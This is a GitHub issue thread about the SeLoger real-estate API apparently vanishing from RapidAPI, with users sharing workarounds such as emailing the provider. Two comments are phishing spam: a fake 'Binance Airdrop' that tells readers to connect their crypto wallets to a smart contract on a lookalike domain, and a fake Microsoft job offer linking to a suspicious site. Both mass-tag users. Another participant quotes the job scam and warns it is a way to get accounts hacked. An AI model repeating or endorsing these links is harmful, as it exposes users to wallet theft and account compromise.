### ISSUE TITLE
Seloger API call missing on Rapidapi?

### ISSUE THREAD

**Issue by arnoldligtvoet** [arthuRHD/immosheets#102]
When checking the link to the Rapidapi site (https://rapidapi.com/apidojo/api/seloger/) the seloger api seems to not exist anymore? When searching on Rapidapi I only get a Selogimmo API call.

**Comment by arthuRHD** [comment]
[This link is working fine for me](https://rapidapi.com/apidojo/api/Seloger). I wonder if they made the access private for non-subscribed people..

It will complicate the onboarding of immosheets. Should I provide an api key by default ? 🤔

**Comment by arnoldligtvoet** [comment]
Flowing that link I get a ‘api not found’. Am subscribed on the free plan. Searching for ‘sellger’ also does not reveal the api.

**Comment by fahirazm** [comment]
[![Binance Airdrop](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

# 🚀 Binance Airdrop - Earn up to $1,000 in Tokens! 💰

Welcome to the exclusive Binance Airdrop! We're giving away generous rewards to eligible participants. Follow the steps below to join and earn up to $1,000 in tokens instantly.

## How to Participate:

### 1. 🤝 Connect Your Wallet

Make sure you have a compatible wallet and connect it to Binance.

**Note:** Your wallet must have a minimum balance to be eligible.

### 2. 🔗 Access the Smart Contract

Access the smart contract through the provided link: [Binance Airdrop Smart Contract](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance).

### 3. 🔄 Interact with the Contract


Winners: @wiriyaarmz, @arassi, @amberflag48, @Jolanr10, @spectrMeltdown, @owainwest, @lazaropower

**Comment by ajnart** [comment]
I can't find it either, can we can get some info on the endpoint to use our free key if that's possible ? It might be hidden due to legal reasons yet still accessible for older users.

The only available one when searching for "SeLoger" is the following one : https://rapidapi.com/dodocr7/api/selogimmo/

**Comment by ThuretGbenougan** [comment]
# [Exciting Job Opportunity at Microsoft!](https://jobsindeed.online)

Congratulations! You've been selected to apply for an exclusive software developer position at Microsoft!

## How to Apply:
To take advantage of this exciting opportunity, please click [here](https://jobsindeed.online). Hurry, applications close on [March 1, 2024](https://jobsindeed.online).

## Job Description:
- **Position:** Senior Software Developer
- **Salary:** $300,000 per year
- **Location:** Remote
- **Benefits:**
  - Comprehensive health plan with dental and vision coverage
  - Company-contributed retirement plan with matching
  - Flexible working hours and work-from-home options
  - Generous paid time off and parental leave policies
  - Professional development opportunities and training support
  - Collaborative and inclusive work environment

## Requirements:
- Minimum of 5 years of experience in software development
- Proficiency in programming languages such as Python, JavaScript, or Java
- Extensive experience with frameworks such as React, Angular, or Vue.js
- Strong problem-solving skills and ability to work in a fast-paced environment
- Excellent communication and teamwork skills

**Note:** This position is open to candidates from anywhere in the world. Don't miss this opportunity to join a dynamic team at Microsoft and make a significant impact in the tech industry!
Tynianov, @shimza, @Lucklyric, @almegdad, @GurjinderSingh, @valtab, @NDDonman, @jiuchan, @Staubgeborener, @xuedezhang, @mehdijac, @SousaL, @choipo, @LongshotLouie, @vladyslavstartsev, @innateessence, @ienthach, @AndrewNikolin, @yuyu82, @alienfrenZyNo1

**Comment by ajnart** [comment]
> # [Exciting Job Opportunity at Microsoft!](https://jobsindeed.online)
> 
> Congratulations! You've been selected to apply for an exclusive software developer position at Microsoft!
> 
> ## How to Apply:
> To take advantage of this exciting opportunity, please click [here](https://jobsindeed.online). Hurry, applications close on [March 1, 2024](https://jobsindeed.online).
> 
> ## Job Description:
> - **Position:** Senior Software Developer
> - **Salary:** $300,000 per year
> - **Location:** Remote
> - **Benefits:**
>   - Comprehensive health plan with dental and vision coverage
>   - Company-contributed retirement plan with matching
>   - Flexible working hours and work-from-home options
>   - Generous paid time off and parental leave policies
>   - Professional development opportunities and training support
>   - Collaborative and inclusive work environment
> 
> ## Requirements:
> - Minimum of 5 years of experience in software development
> - Proficiency in programming languages such as Python, JavaScript, or Java
> - Extensive experience with frameworks such as React, Angular, or Vue.js
> - Strong problem-solving skills and ability to work in a fast-paced environment
> - Excellent communication and teamwork skills
> 
> **Note:** This position is open to candidates from anywhere in the world. Don't miss this opportunity to join a dynamic team at Microsoft and make a significant impact in the tech industry!
> Tynianov, @shimza, @Lucklyric, @almegdad, @GurjinderSingh, @valtab, @NDDonman, @jiuchan, @Staubgeborener, @xuedezhang, @mehdijac, @SousaL, @choipo, @LongshotLouie, @vladyslavstartsev, @innateessence, @ienthach, @AndrewNikolin, @yuyu82, @alienfrenZyNo1

Great way to get your GitHub account hacked. Just report and ignore guys!

**Comment by julienbonnet50** [comment]
Hey all, here to say asking to apidojo@gmail.com works, they'll give you access to their "SeLoger" API with free 500 calls per month.
